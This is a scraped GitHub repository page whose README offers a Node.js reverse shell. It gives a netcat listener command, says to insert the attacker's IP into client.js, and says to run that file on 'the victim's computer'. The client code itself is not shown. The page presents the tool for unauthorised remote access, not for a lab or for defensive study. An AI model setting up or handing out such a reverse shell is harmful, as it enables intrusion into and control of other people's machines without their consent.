Skip to content

Latest commit

 

History

14 Commits

Folders and files

NameName
Last commit message
Last commit date
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation


JavaScript Nodejs

Reverse Shell

Reverse Shell made in Node.js, to use open a port and listen to it. You can do this easily with netcat.

nc -l -p 8080

Now put your IP in the IP variable inside the client.js file

var IP = "YOU IP"

Now run the client.js file on the victim's computer, make sure she has the node and lib child_process installed

print


About

Reverse shell made in node.js

Topics

Resources

Stars

3 stars

Watchers

1 watching

Forks

Releases

Packages

Used by

Contributors

Languages